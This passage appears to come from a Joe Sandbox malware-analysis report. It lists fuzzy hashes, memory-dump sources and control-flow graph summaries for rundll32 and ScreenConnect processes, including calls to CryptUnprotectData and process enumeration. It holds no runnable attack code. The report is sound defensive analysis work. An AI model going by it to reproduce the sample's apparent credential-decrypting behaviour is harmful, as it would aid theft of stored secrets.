                                                                      • Opcode Fuzzy Hash: 761f045eda1858e9144128a147aa5d0ae3f547c0405f9f0c575c759c85c9fcb2
                                                                      • Instruction Fuzzy Hash: 8F018F71B00208D7DB18AA6AC4547AF7AE69FC8614F20846DD40AB73D4CFB55D158BD2
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1715206918.0000000004B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B1D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_4b1d000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9db3eb2e003fd808634fc60bfa076a186e93bb4d7f758073696a4fc545cbe36d
                                                                      • Instruction ID: a028b16975c9e4baf7cbb2b8e87ee539c9acf640289066b08f7b670665c7eec9
                                                                      • Opcode Fuzzy Hash: 9db3eb2e003fd808634fc60bfa076a186e93bb4d7f758073696a4fc545cbe36d
                                                                      • Instruction Fuzzy Hash: 89012B315083009AE7104E39DDD8767BFDCDF41324F18C5AAED494B156C279F841C6B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1714309529.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_7100000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 513b75bc29efcea88ee8696e6fe83d0a79ac1e8381f42512b1c8c3be8e94af34
                                                                      • Instruction ID: dbd4c867f99c7fb615fdf63111591fa59ad4a396bff4f0bdd04a47a7ce0e3c97
                                                                      • Opcode Fuzzy Hash: 513b75bc29efcea88ee8696e6fe83d0a79ac1e8381f42512b1c8c3be8e94af34
                                                                      • Instruction Fuzzy Hash: 5FF0AFB1B00109A7EB18AA6885657AF7AB7ABCC704F24402AD105B73C0CFB94E0197E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1714309529.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_7100000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a0f0089268d4d844a988e773699901e80ae42dc908d26078857fedb8ca8b0940
                                                                      • Instruction ID: 60bd94afd3603bf0d35e6e9c38dcc220936f92eb642ee70cee74baafa1618633
                                                                      • Opcode Fuzzy Hash: a0f0089268d4d844a988e773699901e80ae42dc908d26078857fedb8ca8b0940
                                                                      • Instruction Fuzzy Hash: C7F02474749349AFEB161274186137A2BA39B86314F04D86BE546CB2C2DEAC9C4493E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1714309529.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_7100000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f9f0352f899a92539487ab413d89b240a2bf37454607b864936c036d3222542d
                                                                      • Instruction ID: aa30a42fec63b54e500d708181769586fb6250d85174edbcf7bdd3fbd49d6634
                                                                      • Opcode Fuzzy Hash: f9f0352f899a92539487ab413d89b240a2bf37454607b864936c036d3222542d
                                                                      • Instruction Fuzzy Hash: 89F059B67053109BC716593694E07BF6B969FC5510B05802BE808CF3C3DFA49901CBE2
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1714309529.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_7100000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 94d7c0fac43de201cd25c80fc24b8075971df4d74bd08da47cfa7e88864a326c
                                                                      • Instruction ID: e27bbdf6501c4d188c59ebfb7b190b056f5fd05a999cd47de4d6a93beac9a084
                                                                      • Opcode Fuzzy Hash: 94d7c0fac43de201cd25c80fc24b8075971df4d74bd08da47cfa7e88864a326c
                                                                      • Instruction Fuzzy Hash: F9F0F0B13042009FE7129A2EE85089BBFEAEBD5660304806FE509CB3D5DFA09D0583D0
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1714309529.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_7100000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5559620d366643cf74f0136aae07aa0334e937e0df8f5c708149b332929bbad7
                                                                      • Instruction ID: fa3718fbd33dc7b0571dd8212a6e01dfe74f28dfe206cf2bbff8a79bdcbb7453
                                                                      • Opcode Fuzzy Hash: 5559620d366643cf74f0136aae07aa0334e937e0df8f5c708149b332929bbad7
                                                                      • Instruction Fuzzy Hash: 9FF0EC76A1E3946FCB06227434682A5BF5C9F46154F0544F7DA09DB1D3DEA88C0583D6
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1714309529.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_7100000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8250e0aaada82a6364b6689d4ffa2886ed620cd4d443a2dfd8b17a6b68157d7b
                                                                      • Instruction ID: 2cfe73f1a8d54110bfc06aba5507f2589eb3b8d1b85521d2dadc25688b060864
                                                                      • Opcode Fuzzy Hash: 8250e0aaada82a6364b6689d4ffa2886ed620cd4d443a2dfd8b17a6b68157d7b
                                                                      • Instruction Fuzzy Hash: 5AF082B13002009BA712966EE95195BBBDAEBC4660344802FE509DB3D5DFB1AC0547D0
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1714309529.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_7100000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cff10a3ac6cfd4687564a7eef0745a25651f843806830924e30aae297f244be9
                                                                      • Instruction ID: 3234681b9d7e2088d3a044444c26b58e7eba514fca5f1e0ea1eeb20e26c5789f
                                                                      • Opcode Fuzzy Hash: cff10a3ac6cfd4687564a7eef0745a25651f843806830924e30aae297f244be9
                                                                      • Instruction Fuzzy Hash: CAF0E5B17042514FEF2A15609C043E61BD86B52694F0100A7D845C77C3EBF4CD4613E3
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1714309529.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_7100000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 54c0d16bb8995fb7611a4549b3956a44be1acb7bd89e025f4ee99ed38db77a34
                                                                      • Instruction ID: fa0b1700bb31b7c2ed132710e39beed4f1e723d93c40fbbd7bb723597e510164
                                                                      • Opcode Fuzzy Hash: 54c0d16bb8995fb7611a4549b3956a44be1acb7bd89e025f4ee99ed38db77a34
                                                                      • Instruction Fuzzy Hash: DBF0EC767082409BD3115929EC50557BFA6DBC5224F5444BBE50CC7352DD359846C791
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1714309529.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_7100000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: be8fcff7c8bd3c46b9e3677d76039ba5706cb70b9fe2034e150735071aa3f03c
                                                                      • Instruction ID: 64b8022442764fa628d1ffd3749ae0ff1c6ed0c9cbb452cbae745c9e3fa9fa78
                                                                      • Opcode Fuzzy Hash: be8fcff7c8bd3c46b9e3677d76039ba5706cb70b9fe2034e150735071aa3f03c
                                                                      • Instruction Fuzzy Hash: E2E026327042009BE304A92EEC40917F7ABDBC8228B50407EE50CC3315DD32AC428690
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1714309529.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_7100000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 73fc117f26754ee913581bd6c64d78c88ec7645314f310c40b499ef13bb37d8d
                                                                      • Instruction ID: 6b057fa70b6ac09e134d34d1960bc3916f98f5fe51e4a7d2d1f2023eea7646a0
                                                                      • Opcode Fuzzy Hash: 73fc117f26754ee913581bd6c64d78c88ec7645314f310c40b499ef13bb37d8d
                                                                      • Instruction Fuzzy Hash: 50E01A7650112CBBDF162A95A808BEA7B5AFB44360F10C02AF958452E0CB7589A0E7D1
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1714309529.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_7100000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a13e4bc494cb3df1759e2d4a201a1b16b01dc8d1ea9f6371af145bc94459cefd
                                                                      • Instruction ID: d97527ed48b81e6ef31882d4e82101410345206cb0fe0b4186bc1b365511edb0
                                                                      • Opcode Fuzzy Hash: a13e4bc494cb3df1759e2d4a201a1b16b01dc8d1ea9f6371af145bc94459cefd
                                                                      • Instruction Fuzzy Hash: 5AE0DFB0910208EFDB00DFB8E91168C7BF8DB10208F010AAAD408E7690EE31AF808791
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1714309529.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_7100000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8459d60f7bd7c7a6ffc636f31d6bc75e2078ef0bc2cc54829725b6f2090b39bd
                                                                      • Instruction ID: 2ee1665b3591d0bfe9becc11dd93e5c78eefe0caa7a488127a80d937629c79f4
                                                                      • Opcode Fuzzy Hash: 8459d60f7bd7c7a6ffc636f31d6bc75e2078ef0bc2cc54829725b6f2090b39bd
                                                                      • Instruction Fuzzy Hash: 7AE0DFB090A248EFCB00DBB8E90269CBFF4DB49200B4000EAD809DB292EA342F04C791
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1714309529.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_7100000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 372e640e1bccae8c09e56a881fe2359ea2e33af64c717779e86b51de987fea09
                                                                      • Instruction ID: 16c88b30671006e6f5f456645e33f32915e1bed74f3d28fc91be9a91d86a15da
                                                                      • Opcode Fuzzy Hash: 372e640e1bccae8c09e56a881fe2359ea2e33af64c717779e86b51de987fea09
                                                                      • Instruction Fuzzy Hash: 1BD0A77226001CBB5605B618D88696ABB9AE78A3607108433FA02933A4DEA1AC5183D6
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1714309529.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_7100000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: aee17272987bebf8aa13ce61fdb5b4b3fef9301e21d7a6fe1377488ce49340b0
                                                                      • Instruction ID: 6071037780fb3cb6aeae3cef277c754139e799f9ff3bcef4b4fc79b9b1baa63a
                                                                      • Opcode Fuzzy Hash: aee17272987bebf8aa13ce61fdb5b4b3fef9301e21d7a6fe1377488ce49340b0
                                                                      • Instruction Fuzzy Hash: 6CD05B7090120CEFCB00DFB8DA0255DBBF5DB44204B5045E9D809D7350EB316F04DB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1714309529.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_7100000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fe4aa77e5f5d046bb70f5e16d9e7a493f0a687659dd98364c6446c4b4ca29e84
                                                                      • Instruction ID: 49519a45272f95a67ed7bb92a3e0ca2c54d2bad5cf7c1989412fc038d5e252d3
                                                                      • Opcode Fuzzy Hash: fe4aa77e5f5d046bb70f5e16d9e7a493f0a687659dd98364c6446c4b4ca29e84
                                                                      • Instruction Fuzzy Hash: ACD017B0A00208EFDB00DFA8EA0555DBBF9EB44214B5049A9D808E7390EF316F809B91
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1714309529.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_7100000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9f4e193e860058d26f9ce600e63258806a354fe5d8078e3a46c6b8641c6ca014
                                                                      • Instruction ID: 6db29f2ffcbe565023be4832d9651f2adfb93ce04f6a1a8cf9011b26941d453b
                                                                      • Opcode Fuzzy Hash: 9f4e193e860058d26f9ce600e63258806a354fe5d8078e3a46c6b8641c6ca014
                                                                      • Instruction Fuzzy Hash: 8BC08CA7A1429096DF202974B42C3D8BB48EBA1273F44C676D10D8A0C2E73A82228188
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1714309529.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_7100000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 442e05d29924abb6925535e943c2275d2e39a00f9371523a402296299ceba470
                                                                      • Instruction ID: be333f17d3fb6c48762232d90d5e9db5b90e0e87cebc299cac0c61f289d3e5a9
                                                                      • Opcode Fuzzy Hash: 442e05d29924abb6925535e943c2275d2e39a00f9371523a402296299ceba470
                                                                      • Instruction Fuzzy Hash: 42C01272260014AB4705AA54E4865997B66E7591603004067F905973A0DEB15D5287C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1714309529.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_7100000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6baf510a14bde7fad6c51c69041f962b601a30f72ac892b6a7e16f39780cad69
                                                                      • Instruction ID: f89f2139ed741cca20940c7bde3cfdaed521ac34c75132c43734bbd73d94fd25
                                                                      • Opcode Fuzzy Hash: 6baf510a14bde7fad6c51c69041f962b601a30f72ac892b6a7e16f39780cad69
                                                                      • Instruction Fuzzy Hash: 4EC0805114C3D4DDC31351B018107D57F840B11115F0D00EB9584870D3C54D40549373
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1714309529.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_7100000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: de62490e1f11c74cbd32b7afe8ffd5c36ae83f765e52f0d5e5acefe23324a93a
                                                                      • Instruction ID: ec219b9af6955b30aa7ec70b84a71015e0c10630e4afd1e3e35cab24616e8f07
                                                                      • Opcode Fuzzy Hash: de62490e1f11c74cbd32b7afe8ffd5c36ae83f765e52f0d5e5acefe23324a93a
                                                                      • Instruction Fuzzy Hash: 0CB012F640C69357D11BC10404C44EDCB01F77210C3CC8252C04858044A29581B7D2E4
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1714309529.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_7100000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6458bffb338e9b07054c99dba65a0cfb62344a91e5856634456491a20e662166
                                                                      • Instruction ID: 1b49a1d8b11e5bc7de5cb1b504712bbea6e088bd8c3bc37be91d662aace3ba3e
                                                                      • Opcode Fuzzy Hash: 6458bffb338e9b07054c99dba65a0cfb62344a91e5856634456491a20e662166
                                                                      • Instruction Fuzzy Hash: 709002798451097E97008EB0705111B7654D54051C3145057D14D46510D539446646C2

                                                                      Execution Graph

                                                                      Execution Coverage:10%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:52
                                                                      Total number of Limit Nodes:7
                                                                      execution_graph 30727 5e36148 30728 5e3616c 30727->30728 30729 5e3617c 30727->30729 30730 5e36175 30728->30730 30731 5e362b7 6 API calls 30728->30731 30732 5e362c8 6 API calls 30728->30732 30735 5e362b7 30729->30735 30744 5e362c8 30729->30744 30731->30728 30732->30728 30738 5e362bc 30735->30738 30736 5e362ed 30737 5e362f6 30736->30737 30781 5e356c8 30736->30781 30737->30728 30738->30736 30753 5e36437 30738->30753 30760 5e363f8 30738->30760 30767 5e36448 30738->30767 30774 5e363e9 30738->30774 30747 5e362c9 30744->30747 30745 5e362ed 30746 5e362f6 30745->30746 30748 5e356c8 ProcessIdToSessionId 30745->30748 30746->30728 30747->30745 30749 5e36437 2 API calls 30747->30749 30750 5e363e9 2 API calls 30747->30750 30751 5e36448 2 API calls 30747->30751 30752 5e363f8 2 API calls 30747->30752 30748->30745 30749->30745 30750->30745 30751->30745 30752->30745 30757 5e3643c 30753->30757 30754 5e36468 30754->30736 30755 5e3645f 30755->30754 30756 5e365da K32EnumProcesses 30755->30756 30758 5e36612 30756->30758 30757->30755 30784 5e356d4 30757->30784 30758->30736 30763 5e363f9 30760->30763 30761 5e36468 30761->30736 30762 5e365da K32EnumProcesses 30764 5e36612 30762->30764 30763->30736 30765 5e356d4 K32EnumProcesses 30763->30765 30766 5e3645f 30763->30766 30764->30736 30765->30763 30766->30761 30766->30762 30770 5e36449 30767->30770 30768 5e36468 30768->30736 30769 5e365da K32EnumProcesses 30771 5e36612 30769->30771 30772 5e356d4 K32EnumProcesses 30770->30772 30773 5e3645f 30770->30773 30771->30736 30772->30770 30773->30768 30773->30769 30775 5e363ec 30774->30775 30775->30736 30779 5e356d4 K32EnumProcesses 30775->30779 30780 5e3645f 30775->30780 30776 5e36468 30776->30736 30777 5e365da K32EnumProcesses 30778 5e36612 30777->30778 30778->30736 30779->30775 30780->30776 30780->30777 30782 5e36680 ProcessIdToSessionId 30781->30782 30783 5e366f3 30782->30783 30783->30736 30785 5e36588 K32EnumProcesses 30784->30785 30787 5e36612 30785->30787 30787->30757

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 583 5e32381-5e32393 584 5e33098-5e33110 CryptUnprotectData 583->584 585 5e33112-5e33118 584->585 586 5e33119-5e33141 584->586 585->586
                                                                      APIs
                                                                      • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05E330FD
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3002019468.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_5e30000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CryptDataUnprotect
                                                                      • String ID:
                                                                      • API String ID: 834300711-0
                                                                      • Opcode ID: 302634dbb1f74c7936127482cec616fd122292970aabe1f234536764e5f323ca
                                                                      • Instruction ID: 8fb2d35d86ec6bec28bc7e4f2700a722d6b459b154e7cf5b1469936a6e42cda2
                                                                      • Opcode Fuzzy Hash: 302634dbb1f74c7936127482cec616fd122292970aabe1f234536764e5f323ca
                                                                      • Instruction Fuzzy Hash: C9217976804349DFCB10CF99C845ADEBFF5EF48324F14845AE994A7211C335A555CFA1

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 595 5e33090-5e33093 596 5e33098-5e33110 CryptUnprotectData 595->596 597 5e33112-5e33118 596->597 598 5e33119-5e33141 596->598 597->598
                                                                      APIs
                                                                      • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05E330FD
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3002019468.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_5e30000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CryptDataUnprotect
                                                                      • String ID:
                                                                      • API String ID: 834300711-0
                                                                      • Opcode ID: 716f9efb915c766c6dec7d46445f161a169c2ce163d85a35d4334475ed9b9524
                                                                      • Instruction ID: de97e9988f5a4bca59fc7118ee4a506847972e889d95688729ad84a5cd12cb34
                                                                      • Opcode Fuzzy Hash: 716f9efb915c766c6dec7d46445f161a169c2ce163d85a35d4334475ed9b9524
                                                                      • Instruction Fuzzy Hash: D42156B68002099FCB10CF99C845BDEBFF4EB48320F148419E954A7211C339A555CFA1

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 589 5e3238c-5e33110 CryptUnprotectData 591 5e33112-5e33118 589->591 592 5e33119-5e33141 589->592 591->592
                                                                      APIs
                                                                      • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05E330FD
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3002019468.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_5e30000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CryptDataUnprotect
                                                                      • String ID:
                                                                      • API String ID: 834300711-0
                                                                      • Opcode ID: 499d356ef793ffe3992a2da4f983e376f04bc661154be7f42de975e66a11ecb6
                                                                      • Instruction ID: c826874761cb43c21f2ebb3c0e91ad0236a7a80f314301d7cc44de76f9c1f8bf
                                                                      • Opcode Fuzzy Hash: 499d356ef793ffe3992a2da4f983e376f04bc661154be7f42de975e66a11ecb6
                                                                      • Instruction Fuzzy Hash: CC216776800209DFDF10CF99C849BEEBBF5EF48324F108459E954A7211C339A955CFA0

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 40e32eb-40e32ed 1 40e32ef-40e331d 0->1 2 40e3325-40e3395 call 40e3613 0->2 1->2 13 40e33d8-40e353e 2->13 14 40e3397-40e33ad 2->14 48 40e3547-40e3605 13->48 17 40e33af 14->17 18 40e33b6-40e33d6 14->18 17->18 18->13
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q
                                                                      • API String ID: 0-4202989938
                                                                      • Opcode ID: a3619642f6f873017490f1ef047f69f8a8b0d077add508c7abf637c68548861b
                                                                      • Instruction ID: 5ea0cbe17c0d7464a34ebee43a83ed0bbaafd3a56e3854aeb7eeaf298df05c20
                                                                      • Opcode Fuzzy Hash: a3619642f6f873017490f1ef047f69f8a8b0d077add508c7abf637c68548861b
                                                                      • Instruction Fuzzy Hash: 33915E706006069FD719EF79D59069EBBE2FF88304B009B3CD049AB764DB71F9498B94

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 64 40e32f0-40e3395 call 40e3613 76 40e33d8-40e353e 64->76 77 40e3397-40e33ad 64->77 111 40e3547-40e3605 76->111 80 40e33af 77->80 81 40e33b6-40e33d6 77->81 80->81 81->76
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q
                                                                      • API String ID: 0-4202989938
                                                                      • Opcode ID: 988071e36ec56c67e9824c233d895e8036f59df620764fe192fa0e0056a7894d
                                                                      • Instruction ID: 3e3f3ad9bc138da17fbb974c0589987c312301a9310cff270e80798dfa308704
                                                                      • Opcode Fuzzy Hash: 988071e36ec56c67e9824c233d895e8036f59df620764fe192fa0e0056a7894d
                                                                      • Instruction Fuzzy Hash: C5815D706006069FD719EF79D59069EBBE2FF88304B009B3CD049AB754DB71F9488B95

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 196 40e11f8-40e1217 197 40e121d-40e1226 196->197 198 40e1448-40e146d 196->198 201 40e122c-40e1290 197->201 202 40e1474-40e1508 call 40e0f08 197->202 198->202 213 40e12ba-40e12c3 201->213 214 40e1292-40e12b7 201->214 250 40e150d-40e1512 202->250 215 40e12c8-40e12dd 213->215 216 40e12c5 213->216 214->213 265 40e12de call 40e144f 215->265 266 40e12de call 40e11f8 215->266 267 40e12de call 40e14b3 215->267 268 40e12de call 40e11f0 215->268 216->215 220 40e12e4-40e12e6 223 40e12e8-40e12ed 220->223 224 40e1343-40e1350 220->224 225 40e12ef-40e1324 223->225 226 40e1329-40e133c 223->226 231 40e135d 224->231 232 40e1352-40e135b 224->232 239 40e13e8-40e13fc 225->239 226->224 234 40e1362-40e1364 231->234 232->234 237 40e1399-40e13e1 234->237 238 40e1366-40e1392 234->238 237->239 238->237 247 40e13fe 239->247 248 40e1406-40e140b 239->248 247->248 251 40e140d 248->251 252 40e1415-40e141a 248->252 251->252 253 40e142f 252->253 254 40e141c-40e142a call 40e0d7c call 40e0d94 252->254 253->198 254->253 265->220 266->220 267->220 268->220
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (&^q$(bq
                                                                      • API String ID: 0-1294341849
                                                                      • Opcode ID: 950ad451b10d73c6eba49b9a0b6d378d3922664a0f21d5f40d15aaf4bec3f406
                                                                      • Instruction ID: 006443337cf34beb404ab3e5b82e456491ada5ac8ba86f2b892aacb66f3fd5b5
                                                                      • Opcode Fuzzy Hash: 950ad451b10d73c6eba49b9a0b6d378d3922664a0f21d5f40d15aaf4bec3f406
                                                                      • Instruction Fuzzy Hash: 5C816F71F002199FDB15EFB9D4506AEBBB2BF84700F148529E416BB380DE74AD428B95

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 464 5e36448-5e3645d 466 5e36472-5e36479 464->466 467 5e3645f-5e36462 464->467 468 5e3647e-5e364c2 call 5e356d4 466->468 469 5e36468-5e36471 467->469 470 5e3652c-5e36540 467->470 489 5e364c7-5e364cc 468->489 471 5e36542 470->471 472 5e36506-5e3650f 470->472 476 5e3654e-5e36557 471->476 474 5e36511-5e3652b 472->474 475 5e3656c-5e365ce 472->475 481 5e365d0-5e365d8 475->481 482 5e365da-5e36610 K32EnumProcesses 475->482 481->482 483 5e36612-5e36618 482->483 484 5e36619-5e36641 482->484 483->484 490 5e364d2-5e364d5 489->490 491 5e36558-5e36565 489->491 492 5e364d7-5e36504 490->492 493 5e36544-5e36549 490->493 491->475 492->472 492->476 493->468
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3002019468.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
